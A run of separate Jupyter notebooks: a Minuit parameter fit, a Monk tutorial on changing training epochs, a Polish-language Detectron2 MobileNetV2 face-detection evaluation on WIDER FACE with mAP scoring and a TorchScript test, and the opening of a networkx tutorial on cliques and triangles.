mi_old = Minuit(lh.compute, Tc=1.0, r=0.3,GF=0.95,sigma_cell=0.3,sigma_sample=0.2,\
error_sigma_cell=0.1,error_r=0.1,error_GF=0.1,error_Tc=0.1,error_sigma_sample=0.1,\
limit_Tc=(0.00001,2), limit_r=(0.00001,1),limit_GF=(0,1),limit_sigma_cell=(0.00001,1),limit_sigma_sample=(0.00001,1),\
errordef=0.5,print_level=0)
mi_old.migrad();
s = dict(mi_old.values)
for ii in mi_old.errors:
s.update({ii+"_error" : mi_old.errors[ii]})
s.update({'N' : n})
s.update({'leng' : leng})
s.update({'start' : start})
if calc_error:
try:
tmp = mi_old.minos(sigma=2)
for i in tmp:
s.update({i+'_hpd46_l' : tmp[i]['lower'] + mi_old.values[i] })
s.update({i+'_hpd46_u' : tmp[i]['upper'] + mi_old.values[i] })
except:
print('error in errorfind',s['model'])
print('finiscged')
print(sss+SM,nowak,s)
stat = pd.DataFrame([nowak,gamma,s],index=['old','gamma','lognorm'])
stat.set_index('start', append=True, inplace=True)
stat.set_index('leng', append=True, inplace=True)
stat.set_index('N', append=True, inplace=True)
allim.append( stat )
#reorder_levels(['start','leng','model']) )
warnings.filterwarnings('default')
allimnew = pd.concat(allim).sort_index()
with pd.HDFStore('data.pandas',complib='zlib',complevel=9) as st:
st['s100_n10'] = allimnew
```
| github_jupyter |
<a href="https://colab.research.google.com/github/Tessellate-Imaging/monk_v1/blob/master/study_roadmaps/1_getting_started_roadmap/5_update_hyperparams/3_training_params/1)%20Update%20number%20of%20epochs.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Goals
### Learn how to change batch size
# Table of Contents
## [Install](#0)
## [Train for 5 epochs](#1)
## [Train for 15 epochs](#2)
## [Compare both the experiments](#3)
<a id='0'></a>
# Install Monk
## Using pip (Recommended)
- colab (gpu)
- All bakcends: `pip install -U monk-colab`
- kaggle (gpu)
- All backends: `pip install -U monk-kaggle`
- cuda 10.2
- All backends: `pip install -U monk-cuda102`
- Gluon bakcned: `pip install -U monk-gluon-cuda102`
- Pytorch backend: `pip install -U monk-pytorch-cuda102`
- Keras backend: `pip install -U monk-keras-cuda102`
- cuda 10.1
- All backend: `pip install -U monk-cuda101`
- Gluon bakcned: `pip install -U monk-gluon-cuda101`
- Pytorch backend: `pip install -U monk-pytorch-cuda101`
- Keras backend: `pip install -U monk-keras-cuda101`
- cuda 10.0
- All backend: `pip install -U monk-cuda100`
- Gluon bakcned: `pip install -U monk-gluon-cuda100`
- Pytorch backend: `pip install -U monk-pytorch-cuda100`
- Keras backend: `pip install -U monk-keras-cuda100`
- cuda 9.2
- All backend: `pip install -U monk-cuda92`
- Gluon bakcned: `pip install -U monk-gluon-cuda92`
- Pytorch backend: `pip install -U monk-pytorch-cuda92`
- Keras backend: `pip install -U monk-keras-cuda92`
- cuda 9.0
- All backend: `pip install -U monk-cuda90`
- Gluon bakcned: `pip install -U monk-gluon-cuda90`
- Pytorch backend: `pip install -U monk-pytorch-cuda90`
- Keras backend: `pip install -U monk-keras-cuda90`
- cpu
- All backend: `pip install -U monk-cpu`
- Gluon bakcned: `pip install -U monk-gluon-cpu`
- Pytorch backend: `pip install -U monk-pytorch-cpu`
- Keras backend: `pip install -U monk-keras-cpu`
## Install Monk Manually (Not recommended)
### Step 1: Clone the library
- git clone https://github.com/Tessellate-Imaging/monk_v1.git
### Step 2: Install requirements
- Linux
- Cuda 9.0
- `cd monk_v1/installation/Linux && pip install -r requirements_cu90.txt`
- Cuda 9.2
- `cd monk_v1/installation/Linux && pip install -r requirements_cu92.txt`
- Cuda 10.0
- `cd monk_v1/installation/Linux && pip install -r requirements_cu100.txt`
- Cuda 10.1
- `cd monk_v1/installation/Linux && pip install -r requirements_cu101.txt`
- Cuda 10.2
- `cd monk_v1/installation/Linux && pip install -r requirements_cu102.txt`
- CPU (Non gpu system)
- `cd monk_v1/installation/Linux && pip install -r requirements_cpu.txt`
- Windows
- Cuda 9.0 (Experimental support)
- `cd monk_v1/installation/Windows && pip install -r requirements_cu90.txt`
- Cuda 9.2 (Experimental support)
- `cd monk_v1/installation/Windows && pip install -r requirements_cu92.txt`
- Cuda 10.0 (Experimental support)
- `cd monk_v1/installation/Windows && pip install -r requirements_cu100.txt`
- Cuda 10.1 (Experimental support)
- `cd monk_v1/installation/Windows && pip install -r requirements_cu101.txt`
- Cuda 10.2 (Experimental support)
- `cd monk_v1/installation/Windows && pip install -r requirements_cu102.txt`
- CPU (Non gpu system)
- `cd monk_v1/installation/Windows && pip install -r requirements_cpu.txt`
- Mac
- CPU (Non gpu system)
- `cd monk_v1/installation/Mac && pip install -r requirements_cpu.txt`
- Misc
- Colab (GPU)
- `cd monk_v1/installation/Misc && pip install -r requirements_colab.txt`
- Kaggle (GPU)
- `cd monk_v1/installation/Misc && pip install -r requirements_kaggle.txt`
### Step 3: Add to system path (Required for every terminal or kernel run)
- `import sys`
- `sys.path.append("monk_v1/");`
## Dataset - Art style type classification
- https://www.kaggle.com/thedownhill/art-images-drawings-painting-sculpture-engraving
```
! wget --load-cookies /tmp/cookies.txt "https://docs.google.com/uc?export=download&confirm=$(wget --save-cookies /tmp/cookies.txt --keep-session-cookies --no-check-certificate 'https://docs.google.com/uc?export=download&id=1elVvUTgoX_E4QuLAUP-tUhMcYNhH117E' -O- | sed -rn 's/.*confirm=([0-9A-Za-z_]+).*/\1\n/p')&id=1elVvUTgoX_E4QuLAUP-tUhMcYNhH117E" -O art_style_type.zip && rm -rf /tmp/cookies.txt
! unzip -qq art_style_type.zip
```
# Imports
```
#Using gluon backend
# When installed using pip
from monk.gluon_prototype import prototype
# When installed manually (Uncomment the following)
#import os
#import sys
#sys.path.append("monk_v1/");
#sys.path.append("monk_v1/monk/");
#from monk.gluon_prototype import prototype
```
<a id='1'></a>
# Train For 5 epochs
```
gtf = prototype(verbose=1);
gtf.Prototype("change-train-epochs", "epochs_5");
gtf.Default(dataset_path="art_style_type/train",
model_name="resnet18_v1",
freeze_base_network=False,
num_epochs=5);
#Read the summary generated once you run this cell.
#Start Training
gtf.Train();
#Read the training summary generated once you run the cell and training is completed
# Lets validate on training data itself
gtf = prototype(verbose=1);
gtf.Prototype("change-train-epochs", "epochs_5", eval_infer=True);
gtf.Dataset_Params(dataset_path="art_style_type/val");
gtf.Dataset();
accuracy, class_based_accuracy = gtf.Evaluate();
```
<a id='2'></a>
# Train for 15 epochs
```
gtf = prototype(verbose=1);
gtf.Prototype("change-train-epochs", "epochs_15");
gtf.Default(dataset_path="art_style_type/train",
model_name="resnet18_v1",
freeze_base_network=False,
num_epochs=5);
#Read the summary generated once you run this cell.
```
## Update training epochs
```
gtf.update_num_epochs(15);
# Very important to reload post updates
gtf.Reload();
#Start Training
gtf.Train();
#Read the training summary generated once you run the cell and training is completed
```
## Validate the trained classifier on training data itself
```
gtf = prototype(verbose=1);
gtf.Prototype("change-train-epochs", "epochs_15", eval_infer=True);
gtf.Dataset_Params(dataset_path="art_style_type/val");
gtf.Dataset();
accuracy, class_based_accuracy = gtf.Evaluate();
```
<a id='3'></a>
# Compare experiments
```
# Invoke the comparison class
from monk.compare_prototype import compare
# Create a project
gtf = compare(verbose=1);
gtf.Comparison("Statistics");
# Add experiment
gtf.Add_Experiment("change-train-epochs", "epochs_5");
gtf.Add_Experiment("change-train-epochs", "epochs_15");
# Generate stats
gtf.Generate_Statistics();
os.listdir("workspace/comparison/Statistics")
# We are interested in training times, validation accuracies and train-test plots
from IPython.display import Image
Image(filename="workspace/comparison/Statistics/stats_best_val_acc.png")
from IPython.display import Image
Image(filename="workspace/comparison/Statistics/stats_training_time.png")
```
## Longer training with more epochs
```
from IPython.display import Image
Image(filename="workspace/comparison/Statistics/train_accuracy.png")
from IPython.display import Image
Image(filename="workspace/comparison/Statistics/val_accuracy.png")
```
# Goals Completed
### Learn how to change batch size
| github_jupyter |
<a href="https://colab.research.google.com/github/DarekGit/FACES_DNN/blob/master/notebooks/07_03_WIDERFACE_Detectron2_DD_mobilenet_v2_test%2BScript_V2.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
###[Spis Treści](https://github.com/DarekGit/FACES_DNN/blob/master/notebooks/Praca_Dyplomowa.ipynb)
[7. Eksport modelu](07_00_Eksport_modelu.ipynb)
# Install detectron2
Detectron2 https://github.com/facebookresearch/detectron2 <br>
Detectron2 Beginner's Tutorial https://colab.research.google.com/drive/16jcaJoc6bCFAQ96jDe2HwtXj7BMD_-m5 <br>
Documentation https://detectron2.readthedocs.io <br>
Detectron2 Model Zoo and Baselines https://github.com/facebookresearch/detectron2/blob/master/MODEL_ZOO.md <br>
Rethinking ImageNet Pre-training https://arxiv.org/pdf/1811.08883.pdf <br>
Wykorzystano kody z <br>
https://github.com/youngwanLEE/vovnet-detectron2
```
import os
def Wider_load(val=True,train=True,test=False):
os.makedirs('WIDER/', exist_ok=True)
if val:
#!gdown https://drive.google.com/uc?id=0B6eKvaijfFUDd3dIRmpvSk8tLUk
!gdown https://drive.google.com/uc?id=1-5A_pa_jDS7gk8mHVCBB7ApV5KN8jWDr -O WIDER/tempv.zip
!unzip -q WIDER/tempv.zip -d WIDER
!rm WIDER/tempv.zip
if train:
### WIDER Face Training Images
#!gdown https://drive.google.com/uc?id=0B6eKvaijfFUDQUUwd21EckhUbWs
!gdown https://drive.google.com/uc?id=1-1iJfmXKYvAx9uLdRDX5W6HHG_KZv1jH -O WIDER/temptr.zip
!unzip -q WIDER/temptr.zip -d WIDER
!rm WIDER/temptr.zip
if test:
#!gdown https://drive.google.com/uc?id=0B6eKvaijfFUDbW4tdGpaYjgzZkU
!gdown https://drive.google.com/uc?id=1tTpUJZEQMKDVxKT6100V5FwDuGX_8sDi -O WIDER/tempt.zip
!unzip -q WIDER/tempt.zip -d WIDER
!rm WIDER/tempt.zip
### Face annotations
!wget mmlab.ie.cuhk.edu.hk/projects/WIDERFace/support/bbx_annotation/wider_face_split.zip -O WIDER/tempa.zip
!unzip -q WIDER/tempa.zip -d WIDER
!rm WIDER/tempa.zip
#annotations tool
!gdown https://drive.google.com/uc?id=1_9ydMZlTNFXBOMl16xsU8FSBmK2PW4lN -O WIDER/tools.py
#zestaw z danymi wyników trenowania
!gdown https://drive.google.com/uc?id=1Sk6JWWZFHfxvAJtF7JKOk9ptfyVZWNoU -O WIDER/WIDER_test_set.json
#mAP tools
!wget -q -O WIDER/mAP.py https://drive.google.com/uc?id=1PtEsobTFah3eiCDbSsYblOGbe2fmkjGR
### Examples and formats of the submissions
#!wget mmlab.ie.cuhk.edu.hk/projects/WIDERFace/support/example/Submission_example.zip
def repo_load():
!pip install cython pyyaml==5.1
!pip install -U 'git+https://github.com/cocodataset/cocoapi.git#subdirectory=PythonAPI'
# install detectron2:
!git clone https://github.com/facebookresearch/detectron2 detectron2_repo
!pip install -q -e detectron2_repo
!gdown https://drive.google.com/uc?id=1U0SVkSaSio4TBiXvF1QfTZI65WYpXpZ9
!unzip -qo mobilenet.zip
!rm -f mobilenet.zip
repo_load()
Wider_load(train=False) #Wider_load(train=False) #
#Faces_DD set
!pip install gdown
import gdown
url = 'https://drive.google.com/uc?export=download&id=1XwVm-2EMFdy9Zq39pKFr5UoSJvgTOm-7'
output = 'Faces_DD.zip'
gdown.download(url, output, False)
!unzip -qo Faces_DD.zip
!rm Faces_DD.zip
url = 'https://drive.google.com/uc?export=download&id=1gIIUK518Ft9zi3VDVQZLRVozI-Hkpgt2'
output = 'Faces_DD/Faces_DD_metrics.json'
gdown.download(url, output, False)
```
<font color=red> Restart runtime to continue... <b>Crtl+M.</b> </font>
```
!nvidia-smi
from psutil import virtual_memory
print('Your runtime has {:.1f} gigabytes of available RAM\n'.format(virtual_memory().total / 1e9))
#!gdown https://drive.google.com/uc?id=1Sk6JWWZFHfxvAJtF7JKOk9ptfyVZWNoU -O WIDER/WIDER_test_set.json
import time
import torch, torchvision
import detectron2
from detectron2.utils.logger import setup_logger
setup_logger()
from google.colab import drive
import os
import cv2
import random
import itertools
import shutil
import glob
import json
import numpy as np
import pandas as pd
from PIL import ImageDraw, Image
from collections import defaultdict
import matplotlib.pyplot as plt
from matplotlib.patches import Ellipse
from matplotlib import collections as mc
from google.colab.patches import cv2_imshow
from detectron2 import model_zoo
import detectron2.utils.comm as comm
from detectron2.engine import DefaultPredictor, DefaultTrainer, HookBase
from detectron2.config import get_cfg
from detectron2.utils.visualizer import Visualizer
from detectron2.data import DatasetCatalog, MetadataCatalog, build_detection_train_loader
from detectron2.structures import BoxMode
from detectron2.data import build_detection_test_loader
from detectron2.data.datasets import register_coco_instances
from detectron2.evaluation import COCOEvaluator, inference_on_dataset
from mobilenet.utils import add_mobilenet_config, build_mobilenetv2_fpn_backbone
from WIDER.mAP import mAP, plot_mAP
from WIDER.tools import annotations,output_Files
#sciezki do trenowanych wag modeli mobilenet
with open('WIDER/WIDER_test_set.json','r') as f:
test_set=json.load(f)
output_files=output_Files()
with open('Faces_DD/Faces_DD_metrics.json','r') as f:
Faces_DD=json.load(f)
resF,resW ={},{} # wyniki dla Feces i Wider {gbxs,dbxs,metric}
test_set['BN_Mish_V2_250+F_2_100k'] #best model BN+Mish V2 250k iterations + FrozenBN 100k iterations
len(test_set.keys()),test_set.keys()
```
800k - trenowanie na parametrach domyslnych do 800k iteracji
BN_800k - z BatchNormalization do 800k
BN_V2_300k - BN + normalizacja w preprocesing + poprawiony format na RGB
BN_Mish - zmieniona funkcja aktywacji na Mish z ReLU6
BN_Mish + F - douczania ze zmienionym BN na FrozenBN
# Prepare the dataset
## WIDER FACE: A Face Detection Benchmark
http://shuoyang1213.me/WIDERFACE/ <br>
https://arxiv.org/pdf/1511.06523.pdf <br>
```
from detectron2.data.datasets.coco import convert_to_coco_json
annos={}
train = annotations("train")
if len(train)>0: annos['train']=train
val = annotations('val')
if len(val)>0: annos['val']=val
test = annotations('test') #random.samples(annotations('test'),5000)
if len(test)>0: annos['test']=test
for d in annos.keys():
DatasetCatalog.register("face_" + d, lambda d=d: annos[d])
MetadataCatalog.get("face_" + d).set(thing_classes = ['face'])
'''
faces_metadata = MetadataCatalog.get("face_train")
convert_to_coco_json('face_train', "./OUTPUT/face_train_coco_format.json")
'''
```
# "Base-RCNN-MobileNet-FPN_v1.yaml"
mobilenet/configs
Użycie modelu
```
# pelny zestaw kodow, wynikow
# https://drive.google.com/drive/folders/1ApEnn3br2Z2Nt3-0Ve9DKYKMiDkFVpAR?usp=sharing
#zestawy z konfiguracja cfg
cfg_set = {
'FrozenBN':'https://drive.google.com/uc?id=1rZFzJaR_g7uYuTguTdbUuCQYD4eXLeqw',
'BN': 'https://drive.google.com/uc?id=1-doXtwe5iZHoqPzKGc2ZZbxj6Ebhxsn4',
'BN_V2':'https://drive.google.com/uc?id=1wywB8UAaOO5KZx3IS35kV-rLsvJMIse6',
'BN_Mish':'https://drive.google.com/uc?id=1-axV3KKg8-YiZZ7uDBh_2v181JoC9Nj3',
'BN_Mish_V2':'https://drive.google.com/uc?id=1WoESx5RYvpapNicpSrmMoNJeE2GVm3zK',
'BN_Mish_V3':'https://drive.google.com/uc?id=1-Kgd_2AS4EsD_ZPqP7SxkscyDjP-Qhnr',
'BN_Mish_V2F':'https://drive.google.com/uc?id=1pCwyYCjIoduro2vIKMZi5HhlpaypH0_x',
}
def test_set_add(config,count,pth,ext=''): #config name or index of cf_set.keys(), count @ .000
set_list=list(cfg_set.keys())
if (isinstance(config,str) and not config in set_list) or (isinstance(config,int)) and config >=len(set_list):
print('No ',config,' on the list: ', cfg_set.keys())
else:
config=list(cfg_set.keys())[config] if isinstance(config,int) else config
set_choice=config+ext+'_'+str(count)+'k'
weights='model_{:07}.pth'.format((count*1000)-1)
test_set[set_choice]={'pth':'https://drive.google.com/uc?id='+pth,
'weights_name': weights,
'config': config,}
return set_choice,test_set[set_choice]
#Weights and cfg configuration from training
cfg = get_cfg()
add_mobilenet_config(cfg)
def cfg_write(cfg,cfg_all):
for key in cfg_all.keys():
if isinstance(cfg_all[key],dict): cfg_write(cfg[key],cfg_all[key])
else: cfg[key]=cfg_all[key]
return cfg
def set_predictor(set_choice,device='cuda'):
print('PREPARATION: ',set_choice)
path = test_set[set_choice]['pth'] #sciezka do wag modelu
out = test_set[set_choice]['weights_name']
!gdown $path #-O $out #bez, mamy kontrole zgodnosci nazwy pliku
path=cfg_set[test_set[set_choice]['config']] #sciezka do konfiguracji
!gdown -q $path -O 'Base-RCNN-MobileNet-FPN_V1_ALL.json'
with open('Base-RCNN-MobileNet-FPN_V1_ALL.json','r') as f:
cfg_all=json.load(f)
cfg = get_cfg(); add_mobilenet_config(cfg)
cfg=cfg_write(cfg,cfg_all)
cfg.MODEL.WEIGHTS = test_set[set_choice]['weights_name']
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5 # set the testing threshold for this model
cfg.MODEL.DEVICE=device
return DefaultPredictor(cfg),cfg,set_choice
```
AP metric on val
```
def plot_marks(img,metric,dbxs=[],figsize=(14,14)):
fig, ax = plt.subplots(1,1,figsize=figsize); ax.imshow(img)
Ms=np.array(metric['marks'])
color,color_det,lw=('white','red',1)
for k,dbx in enumerate(metric['marks']):
annot=str(k)+' - '+metric['persons'][k]
ax.annotate(annot,np.array(dbx[:2])+2,color='k')
ax.annotate(annot,dbx[:2],color='w')
if dbxs != []:
cbox = mc.LineCollection([[[l,t],[r,t],[r,b],[l,b],[l,t]] for l,t,r,b,_ in dbxs], linewidth=lw+1, colors=color_det)
ax.add_collection(cbox)
cbox = mc.LineCollection([[[l,t],[r,t],[r,b],[l,b],[l,t]] for l,t,r,b in Ms], linewidth=lw, colors=color)
ax.add_collection(cbox)
print(len(metric['marks']),end=', ')
print('Annotated Boxes',end=', ')
print(' '+metric['path'])
for name in metric['persons']:
if name !='': print(name,end=', ')
#plt.axis('off')
plt.show()
def results(d_set,predictor,name='mAP_',ext='---',pres=False):
start=time.time()
gbxs=[]; dbxs=[]; dset=d_set
if 'annotations' in d_set[0].keys(): #zmiana metryki z Wider do Faces, wybrane pola
dset=[]
for r in d_set:
dset.append({'path' : r['file_name'],'marks' : [b['bbox'] for b in r['annotations']],
'persons': ['' for b in r['annotations']]})
Len=len(dset); print(ext,' ',Len,' imgs : 0 +',end='')
for i,d in enumerate(dset): #przypisanie listy detetected i ground truth boxes
im = cv2.imread(d["path"])
outputs = predictor(im)
pbxs=outputs['instances'].pred_boxes.tensor.tolist()
pconfs=outputs['instances'].scores.tolist()
dbx=[[*(np.array(bx)+0.5).astype('int'),pconfs[i]] for i,bx in enumerate(pbxs)]
dbxs.append(dbx)
gbxs.append(d['marks'] if d['marks']!=[0,0,0,0] else []) #########################
if not i%100 : print('\r',ext,' ',Len,' imgs : ',i//100*100,' +',end='')
if not (i+1)%10 : print(' ',(i+1)%100,end='')
total=time.time()-start
print('\r',name,ext,' - total time {:.2f} s per img {:.4f} s'.format(total,total/(i+1)))
# IoUs=[.5,.55,.6,.65,.7,.75,.8,.85,.9,.95,.0]
# keys ['All {:.2f}' for x in IoUs] + ['large','medium','small'] for IoUs[0]
# r_p: 0 - interpolated, 1 - full
m,d=mAP(gbxs,dbxs,data=True)
plot_mAP(m,d,['All 0.50','All 0.00','large','medium','small'],1,name+ext+' conf>0',file=name+ext)
if pres:
for l in [58,233,259,365,388,394,413,424,446,455,483,532,683,709,722,802,809,874,759]:
if l < Len:
m=dset[l]
print('------------------------ idx ',l,' gtx/dbxs',len(m['marks']),'/',len(dbxs[l]))
plot_marks(Image.open(m['path']),m,dbxs[l],figsize=(18,14))
return {'gbxs':gbxs,'dbxs':dbxs,'metric':dset}
#['FrozenBN', 'BN', 'BN_V2', 'BN_Mish', 'BN_Mish_V2', 'BN_Mish_V3', 'BN_Mish_V2F'] cfg sets
test_set_add(6,300,'10JXHtaSjBtDt0b0Sa6X4esBSysnBb2v-','_250+F_22')
test_set_add(4,250,'1-NY6ZeI_0YsI6axbBG9kGpcAr-M0S4wT',) #najlepszy wynik do dalszego douczania
test_set_add(6,50,'1-I6YSAs9NrORI4cFISfK_-4Yhm1twfDi','_250+F_2') # najlepszy wynik douczania
with open('WIDER_test_set.json','w')as f:
json.dump(test_set,f)
```
#wybór zestawów do analizy
```
for key in test_set.keys():
if 'F_2' in key: print(key)
set_choices=['BN_Mish_V2_250+F_2_100k',] #'BN_Mish_V2F_250+F_22_300k']
for c in set_choices:
if c in test_set.keys(): print(c,' is OK, ',end='')
else: print('\n!!!!!!! ',c,' is not in test_set!, ',end='')
set_choices[0],test_set[set_choices[0]]
predictor,cfg,ext=set_predictor(set_choices[-1],device='cuda') #normalnie cuda
print(cfg.dump())
l = [58,233,259,365,388,394,413,424,446,455,483,532,683,709,722,802,809,874,759]
for i in l:
d=val[i]
im = cv2.imread(d["file_name"])
outputs = predictor(im[:, :, ::])
v = Visualizer(im,metadata=faces_metadata, scale=.7)
v = v.draw_instance_predictions(outputs["instances"].to("cpu"))
cv2_imshow(v.get_image()[:, :, ::])
for d in random.sample(val, 5):
im = cv2.imread(d["file_name"])
outputs = predictor(im[:, :, ::])
v = Visualizer(im,metadata=faces_metadata, scale=0.7)
v = v.draw_instance_predictions(outputs["instances"].to("cpu"))
cv2_imshow(v.get_image()[:, :, ::])
!rm D*
for c in set_choices:
predictor,cfg,ext =set_predictor(c)
resF[c]=results(Faces_DD,predictor,'Detectron2_Faces_DD_mAP_MN2_',ext,pres=False)
resW[c]=results(val,predictor,'Detectron2_Wider_Face_mAP_MN2_',ext,pres=False)
for c in set_choices:
res=mAP(resW[c]['gbxs'],resW[c]['dbxs'],data=False)
Ap=[]
for i in range(10):
Ap.append(res[0]['All {:.2f}'.format(0.5+i*0.05)][0])
print(c,' mAP: ',sum(Ap)/10,'\nset: ', Ap) #srednie AP dla conf [.5 ... 0.95]
resF[set_choices[0]]['metric'][0]
import json
def to_int(data):
if isinstance(data,dict):
for key in data.keys(): data[key]=to_int(data[key])
if isinstance(data,list):
for k in range(len(data)): data[k]=to_int(data[k])
if isinstance(data,tuple):
data=list(data)
for k in range(len(data)): data[k]=to_int(data[k])
if 'int' in data.__class__.__name__:
data=int(data)
return data
#json obsluguje calkowite tylko w typie int
iresF = to_int(resF)
iresW = to_int(resW)
with open('Results Detectron2_mobilenetV2_Faces.json','w') as f:
json.dump(iresF,f)
with open('Results Detectron2_mobilenetV2_Wider.json','w') as f:
json.dump(iresW,f)
for c in list(iresF.keys())[:1]:
_,d,ms=iresF[c].values(); num=len(ms) #d dbxs, ms metrics
for l in [58,233,259,365,388,394,413,424,446,455,483,532,683,709,722,802,809,874,759]:
if l < num:
m=ms[l]
print('------------------------ idx ',l,' gtx/dbxs',len(m['marks']),'/',len(d[l]))
plot_marks(Image.open(m['path']),m,d[l],figsize=(16,12))
for c in list(iresW.keys())[-1:]:
_,d,ms=iresW[c].values(); num=len(ms) #d dbxs, ms metrics
for l in [58,233,259,365,388,394,413,424,446,455,483,532,683,709,722,802,809,874,759]:
if l < num:
m=ms[l]
print('------------------------ idx ',l,' gtx/dbxs',len(m['marks']),'/',len(d[l]))
plot_marks(Image.open(m['path']),m,d[l],figsize=(16,12))
!zip -u PNG D*.png
#inicjalizacja sieci mtcnn, pelny opis dostepny: help(MTCNN)
#mtcnn = MTCNN(image_size=224, margin=0, keep_all=True)
```
total time 1317.56 per img 0.4084
#Eval na train
```
cfg.OUTPUT_DIR='./OUTPUT'
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.05 # set the testing threshold for this model
cfg.DATASETS.TEST = ("face_train", )
cfg.DATASETS.VAL = ("face_val", )
trainer =DefaultTrainer(cfg)
trainer.resume_or_load(resume=True)
cfg.MODEL.WEIGHTS
MetadataCatalog.get('face_val'),MetadataCatalog.get('face_train')
from detectron2.evaluation import COCOEvaluator, inference_on_dataset
from detectron2.data import build_detection_test_loader
evaluator = COCOEvaluator("face_train", cfg, False, output_dir="./OUTPUT/")
val_loader = build_detection_test_loader(cfg, "face_train")
inference_on_dataset(trainer.model, val_loader, evaluator)
```
#eval +100k
```
from detectron2.evaluation import COCOEvaluator, inference_on_dataset
from detectron2.data import build_detection_test_loader
evaluator = COCOEvaluator("face_val", cfg, False, output_dir="./OUTPUT/")
val_loader = build_detection_test_loader(cfg, "face_val")
inference_on_dataset(trainer.model, val_loader, evaluator)
```
#test Script modelu
```
import time
import torch
import json
import numpy as np
from PIL import Image
from WIDER.mAP import mAP, plot_mAP
from WIDER.tools import annotations,output_Files
train = annotations("val")
val = annotations('val')
with open('Faces_DD/Faces_DD_metrics.json','r') as f:
Faces_DD=json.load(f)
resF,resW ={},{} # wyniki dla Feces i Wider {gbxs,dbxs,metric}
#zaladuj model, wejscie o stalym rozmiarze ([image BGR<3,800,1216>,],[[h,w,skala],]) (h,w) okno do odczytu,skala do odtworzenia oryginalu
!wget -q -O model.ts https://drive.google.com/uc?id=107Ym7yjAQlA6FhzAQvHoPITZnsm8Z5Co
model=torch.jit.load('model.ts')
#keep aspect to match size(800,1216) of model
def to_inputs(img):
#zmian rozmiaru, aby najwiekszy wymiar pokrywal sie z jednym rozmiarow wejsciowych modelu (800,1216)
scale=1216/img.size[0]
size=(int(img.size[1]*scale),1216)
if size[0]>800:
scale=800/size[0]
size=(800,int(size[1]*scale))
scale=size[1]/img.size[0]
img_arg=torch.tensor([*size,scale]) #argumenty do wejscia
img=img.resize((size[1],size[0])).crop((0,0,1216,800))
imgs=torch.tensor(np.array(img)[:,:,::-1].copy()).permute(2,0,1).expand(1,3,800,1216).cuda() #BGR 3,800,1216
return (imgs,img_arg.expand(1,3).cuda())
def script_results(d_set,model,name='mAP_',ext='ScriptModel',pres=False):
start=time.time()
gbxs=[]; dbxs=[]; dset=d_set
if 'annotations' in d_set[0].keys(): #zmiana metryki z Wider do Faces, wybrane pola
dset=[]
for r in d_set:
dset.append({'path' : r['file_name'],'marks' : [b['bbox'] for b in r['annotations']],
'persons': ['' for b in r['annotations']]})
Len=len(dset); print(ext,' ',Len,' imgs : 0 +',end='')
if 'Script' in model.__class__.__name__:
for i,d in enumerate(dset): #przypisanie listy detetected i ground truth boxes
img = Image.open(d["path"])
inputs=to_inputs(img)
_,_,s = inputs[1][0].cpu() #skala
outputs=model(inputs)
pbxs=outputs[0].cpu()
pconfs=outputs[1].cpu()
dbx=[[*(np.array(bx)+0.5).astype('int'),pconfs[i]] for i,bx in enumerate(pbxs)]
dbxs.append(dbx)
gbxs.append([[int(x*s+0.5) for x in bx] for bx in d['marks']]) #przeskalowanie anotacji
if not i%100 : print('\r',ext,' ',Len,' imgs : ',i//100*100,' +',end='')
if not (i+1)%10 : print(' ',(i+1)%100,end='')
total=time.time()-start
print('\r',name,ext,' - total time {:.2f} s per img {:.4f} s'.format(total,total/(i+1)))
# IoUs=[.5,.55,.6,.65,.7,.75,.8,.85,.9,.95,.0]
# keys ['All {:.2f}' for x in IoUs] + ['large','medium','small'] for IoUs[0]
# r_p: 0 - interpolated, 1 - full
m,d=mAP(gbxs,dbxs,data=True)
plot_mAP(m,d,['All 0.50','All 0.00','large','medium','small'],1,name+ext+' conf>0',file=name+ext)
if pres:
for l in [58,233,259,365,388,394,413,424,446,455,483,532,683,709,722,802,809,874,759]:
if l < Len:
m=dset[l]
print('------------------------ idx ',l,' gtx/dbxs',len(m['marks']),'/',len(dbxs[l]))
plot_marks(Image.open(m['path']),m,dbxs[l],figsize=(18,14))
return {'gbxs':gbxs,'dbxs':dbxs,'metric':dset}
set_choices=['ScriptModel',]
for c in set_choices:
resF[c]=script_results(Faces_DD,model,'Detectron2_Faces_DD_mAP_',c,pres=False)
resW[c]=script_results(val,model,'Detectron2_Wider_Face_mAP_',c,pres=False)
for c in set_choices:
res=mAP(resW[c]['gbxs'],resW[c]['dbxs'],data=False)
Ap=[]
for i in range(10):
Ap.append(res[0]['All {:.2f}'.format(0.5+i*0.05)][0])
print(c,' mAP: ',sum(Ap)/10,'\nset: ', Ap) #srednie AP dla conf [.5 ... 0.95]
```
<br><br>
[7. Eksport modelu](07_00_Eksport_modelu.ipynb)
###[Spis Treści](https://github.com/DarekGit/FACES_DNN/blob/master/notebooks/Praca_Dyplomowa.ipynb)
| github_jupyter |
```
import networkx as nx
import matplotlib.pyplot as plt
import warnings
from custom import custom_funcs as cf
warnings.filterwarnings('ignore')
%matplotlib inline
%load_ext autoreload
%autoreload 2
```
# Cliques, Triangles and Squares
Let's pose a problem: If A knows B and B knows C, would it be probable that A knows C as well? In a graph involving just these three individuals, it may look as such:
```
G = nx.Graph()
G.add_nodes_from(['a', 'b', 'c'])
G.add_edges_from([('a','b'), ('b', 'c')])
nx.draw(G, with_labels=True)
```
Let's think of another problem: If A knows B, B knows C, C knows D and D knows A, is it likely that A knows C and B knows D? How would this look like?
```
G.add_node('d')
G.add_edge('c', 'd')
G.add_edge('d', 'a')
nx.draw(G, with_labels=True)
```
The set of relationships involving A, B and C, if closed, involves a triangle in the graph. The set of relationships that also include D form a square.
You may have observed that social networks (LinkedIn, Facebook, Twitter etc.) have friend recommendation systems. How exactly do they work? Apart from analyzing other variables, closing triangles is one of the core ideas behind the system. A knows B and B knows C, then A probably knows C as well.
If all of the triangles in the two small-scale networks were closed, then the graph would have represented **cliques**, in which everybody within that subgraph knows one another.
In this section, we will attempt to answer the following questions:
1. Can we identify cliques?
2. Can we identify *potential* cliques that aren't currently present in the network?
3. Can we model the probability that two unconnected individuals know one another?
## Load Data
As usual, let's start by loading some network data. This time round, we have a [physician trust](http://konect.uni-koblenz.de/networks/moreno_innovation) network, but slightly modified such that it is undirected rather than directed.
